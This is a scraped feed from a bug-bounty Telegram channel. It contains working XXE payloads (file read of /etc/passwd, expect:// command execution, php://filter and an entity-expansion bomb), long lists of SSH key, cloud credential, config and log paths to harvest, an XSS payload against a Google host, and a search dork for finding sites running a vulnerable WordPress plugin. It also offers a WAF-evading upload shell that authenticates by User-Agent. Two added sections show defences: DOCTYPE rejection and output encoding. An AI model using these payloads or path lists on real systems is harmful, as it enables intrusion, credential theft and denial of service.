Brut Security
Queries: @wtf_brut
🛃WhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
📨E-mail: [email protected]
Certified Red Team Professional (CRTP) - Notes
📝🔥
🔗https://dev-angelist.gitbook.io/crtp-notes
🔖Extracting endpoints from JavaScript bookmarklets
⬇️Usage
🔴Add a new bookmark in your browser’s toolbar
🔴Replace the bookmark’s URL with the following JavaScript code:

javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();

🔴Visit the target page and click the bookmarklet. The script will run in your browser, revealing previously undiscovered endpoints right on the page.
Hey everyone!
Sorry for not being active lately—been dealing with some health stuff. I’ll be back soon with loads of content.
Till then, @darkshadow2bd will keep posting cool stuff here.

Stay tuned and take care!
Saumadip | Brut Security
🔥XXE to Remote Code Execution (RCE) – Real-World Attack Chain

Hey Hunters,
DarkShadow here—dropping a quick tip for your next XXE hunt!

Escalate XXE vulnerability 😏

1. Basic XXE Payload (Test Injection)


<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<root>&test;</root>
If the response contains /etc/passwd, the app is XXE vulnerable.


2. RCE via expect:// PHP Wrapper (if enabled)

<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "expect://id">
]>
<root>&xxe;</root>

Result: Executes id command and returns output.
Condition: expect must be compiled with PHP (very rare, but deadly).


3. Local File Read using php://filter

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<foo>&xxe;</foo>

Output: Base64-encoded content of /etc/passwd. Decode it locally. (Effective for bypassing WAF filters and getting any output in the correct format.)


4. XML Bomb (DoS)

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>

Effect: Crashes the XML parser or causes a DoS through entity expansion.

5. Read User Private Keys (SSH)

Useful Paths to Check:
/home/*/.ssh/id_rsa
/root/.ssh/id_rsa
/etc/ssh/ssh_config
/var/backups/
/proc/self/environ (for creds or keys in memory)

🛑Pro tip for more recon:

1. Steal AWS / Cloud Credentials via XXE

Also check:
/home/www-data/.aws/credentials
/proc/self/environ (might expose AWS keys, tokens)
2. Dump Configs for DB Creds or Secrets

Also check:
config.php
.env
db.php
settings.php
wp-config.php (WordPress)
phpmyadmin/config.inc.php (phpmyadmin)
administrator/.env (joomla)
config/services.yaml (Symfony Framework)
app/config.js, app/config.json (nodejs)
settings.py, config.py (Python / Django / Flask)
application.properties, application.yml, web.xml (Java / Spring Boot / JSP Apps)
database.yml (Ruby on Rails)

3. Bash History Abuse

Also check:
.bash_history
Sometimes contains:
MySQL login
Admin tools
SSH commands
Clear-text passwords
4. Read Logs for Token Harvesting


Web Server Logs:

/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error_log

PHP / App-Specific Logs:

/var/log/php_errors.log
/var/log/php8.1-fpm.log
/var/log/php7.4-fpm.log
/var/log/php5-fpm.log
/var/log/php-fpm/www-error.log

Laravel / Symfony / Framework Logs:

storage/logs/laravel.log
/var/www/html/storage/logs/laravel.log
/var/www/html/app/storage/logs/laravel.log
var/log/dev.log (Symfony)
app/logs/dev.log
Authentication / Session Logs
/var/log/auth.log
/var/log/secure
/var/log/faillog
/var/log/wtmp
/var/log/btmp
/var/log/lastlog

System Logs (May Contain Leaks or Stack Traces):

/var/log/syslog
/var/log/messages
/var/log/dmesg
/var/log/kern.log

Database Logs (If Exposed):

/var/log/mysql/error.log
/var/log/postgresql/postgresql.log
/var/log/mariadb/mariadb.log


5. Custom Internal Recon via /proc Files

Also check:
/proc/self/cmdline
/proc/self/fd/

Sometimes exposes secrets in memory or open database connections.

So guys, what about this methodology of mine? If you guys really enjoyed it, don't forget to show your love ❤️

Don't forget to follow me 👉🏼 DarkShadow

#bugbountytips #xxe
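On the defender side, every payload in the chain above (file read, expect://, php://filter, the entity bomb) depends on the parser honouring a DOCTYPE. The script below is an added example, not part of DarkShadow's post, showing how to refuse that at the parser with only the Python standard library: expat's doctype and entity-declaration callbacks abort the parse before any entity is touched. The sample documents are the post's own payloads plus a constructed benign one; the dict tree and the `check` helper are this example's own design.

```python
"""Reject DTD-bearing XML before any entity is resolved (added example, stdlib only)."""
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when a document uses DTD features that enable XXE or entity-expansion DoS."""


def parse_untrusted(data: bytes) -> dict:
    """Parse XML from an untrusted client into a small dict tree.

    Any DOCTYPE, and therefore any ENTITY declaration, aborts parsing before the
    parser touches a single entity. That one rule stops file:// reads, PHP wrapper
    entities and the "lol" expansion bomb alike.
    """
    parser = expat.ParserCreate()
    # Defence in depth: never process parameter entities (external DTD subsets).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML(f"DOCTYPE declaration rejected (root element {name!r})")

    def forbid_entity(*_):
        raise UnsafeXML("entity declaration rejected")

    def forbid_external(*_):
        return 0  # returning 0 makes expat treat any external entity reference as fatal

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = forbid_external

    # Minimal tree builder so callers get usable output from a successful parse.
    root = {"tag": None, "attrs": {}, "text": "", "children": []}
    stack = [root]

    def start(tag, attrs):
        node = {"tag": tag, "attrs": attrs, "text": "", "children": []}
        stack[-1]["children"].append(node)
        stack.append(node)

    def end(_tag):
        stack.pop()

    def chars(text):
        stack[-1]["text"] += text

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(data, True)
    return root["children"][0]


def check(data: bytes) -> str:
    """Classify a document as 'ok', 'rejected: ...' or 'malformed: ...'."""
    try:
        parse_untrusted(data)
    except UnsafeXML as exc:
        return f"rejected: {exc}"
    except expat.ExpatError as exc:
        return f"malformed: {exc}"
    return "ok"


# Samples: payload shapes from the post, plus a constructed benign document.
XXE_FILE_READ = b"""<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<root>&test;</root>"""

XXE_PHP_FILTER = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<foo>&xxe;</foo>"""

XML_BOMB = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>"""

BENIGN = b'<?xml version="1.0"?><order><item sku="A1">2</item></order>'

if __name__ == "__main__":
    for name, doc in [("file read", XXE_FILE_READ), ("php filter", XXE_PHP_FILTER),
                      ("bomb", XML_BOMB), ("benign", BENIGN)]:
        print(f"{name:10s} -> {check(doc)}")
```

The same idea applies to other stacks: libxml2-based parsers (PHP's `libxml_disable_entity_loader`, lxml's `resolve_entities=False` and `no_network=True`) and Java's `disallow-doctype-decl` feature all reduce to "no DOCTYPE from the network". Rejecting the whole DOCTYPE is simpler to reason about than allow-listing internal entities, and for API traffic it costs nothing, since JSON-era clients never send one.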
🔥A new tool that reads reconftw results and uses a local LLM (Ollama) to generate actionable reports: bughunter, executive, or brief.

It’s lightweight, fast, and helps turn raw recon into insights.

💥https://github.com/six2dez/reconftw_ai
Good Morning Everyone 💥💥💥💥💥
So how's everything going on? 🔥👀
Hey Hunters,

DarkShadow here again. We all know how frustrating it is to test file upload vulnerabilities—sometimes the file uploads, but you can’t execute it because WAFs or IDS jump in.

So, I’ve built a next-level, compact script that actually bypasses most WAF and IDS protections. It uses 3 stealth techniques to evade restrictions and offers 2 output modes for flexibility.

What makes it even cooler?
No password needed.
It uses a unique auth mechanism based on the User-Agent header—no login form, no cookies, nothing else. If your User-Agent matches, you’re in. If not, the script won’t even respond.



Wanna try it out? drop a comment and let me know. And of course, follow me on X → DarkShadow

#wafbypass
Hey Hunters,
DarkShadow here back again. Dropping a Google XSS POC1😁

POC steps:
Vuln host: aihub.cloud.google.com
Vuln param: /url?q= (GET method)
Technique: double URL encoding
Payload: "><svg/onload=alert(document.domain)>

a simple XSS payload as usual😏

The vulnerability has been patched🥱

Don't forget to follow me 👉🏼 DarkShadow

#xss #poc #googlebug
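Why double URL encoding gets a payload past a filter, and what actually fixes it, as an added Python illustration that is not part of the post and models no specific Google code: a check that decodes once and looks for tag characters sees only `%3C`, while a later second decode restores `<`. HTML-encoding at the output sink closes the gap whatever the decoding depth. The `app_decodes` helper is a constructed model of the downstream double decode.

```python
"""Why 'decode once, then filter' fails against double URL encoding (added example)."""
from html import escape
from urllib.parse import quote, unquote

# The payload from the post, as the plain string the browser would eventually see.
PAYLOAD = '"><svg/onload=alert(document.domain)>'


def url_encode(value: str) -> str:
    """Percent-encode everything except unreserved characters."""
    return quote(value, safe="")


def naive_filter_allows(raw_param: str) -> bool:
    """Flawed server-side check: decode the parameter once, then look for tag characters."""
    decoded = unquote(raw_param)
    return "<" not in decoded and ">" not in decoded


def app_decodes(raw_param: str) -> str:
    """Constructed model of an app that URL-decodes the parameter a second time
    downstream (for example while rebuilding a redirect target), which is the
    behaviour double encoding relies on."""
    return unquote(unquote(raw_param))


def reflect_without_encoding(raw_param: str) -> str:
    """Reflects the decoded value into HTML as-is; the filter above is all that protects it."""
    return f'<a href="{app_decodes(raw_param)}">continue</a>'


def reflect_with_encoding(raw_param: str) -> str:
    """Same reflection, HTML-encoded at the sink, so no decoding depth turns it into markup."""
    return f'<a href="{escape(app_decodes(raw_param), quote=True)}">continue</a>'


if __name__ == "__main__":
    single = url_encode(PAYLOAD)
    double = url_encode(single)
    print("single-encoded passes filter:", naive_filter_allows(single))  # False
    print("double-encoded passes filter:", naive_filter_allows(double))  # True
    print(reflect_without_encoding(double))
    print(reflect_with_encoding(double))
```

Output encoding stops markup injection in this attribute, but an `href` is also a URL context: a value that decodes to a `javascript:` URL would survive HTML encoding, so redirect targets additionally need a scheme and host allow-list.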
WaybackLister is a reconnaissance tool that taps into the Wayback Machine to fetch historical URLs for a domain, parses unique paths, and checks if any of those paths currently expose directory listings. It's fast, multithreaded, and built for practical use in security assessments and bug bounty recon.

https://github.com/anmolksachan/wayBackLister

Join Telegram For More Content: t.iss.one/brutsecurity
----------------------------------------------------------
🎓 Ready to Skill Up? Enroll Now → wa.link/brutsecurity

#CyberSecurity #BugBounty #EthicalHacking #Infosec #BrutSecurity
CVE-2025-27007: Privilege Escalation in OttoKit WordPress Plugin, 9.8 rating 🔥

Errors in the logic of the plugin's API could potentially lead to an attacker gaining access to the administrator account. According to Patchstack, exploitation of the vulnerability began just an hour after public disclosure!

Search at Netlas.io:
👉 Link: https://nt.ls/y4FXX
👉 Dork: http.body:"plugins/suretriggers"

Read more: https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability?_s_id=cve
Good morning hackers 🥱
Need more Google bug POCs? 😁

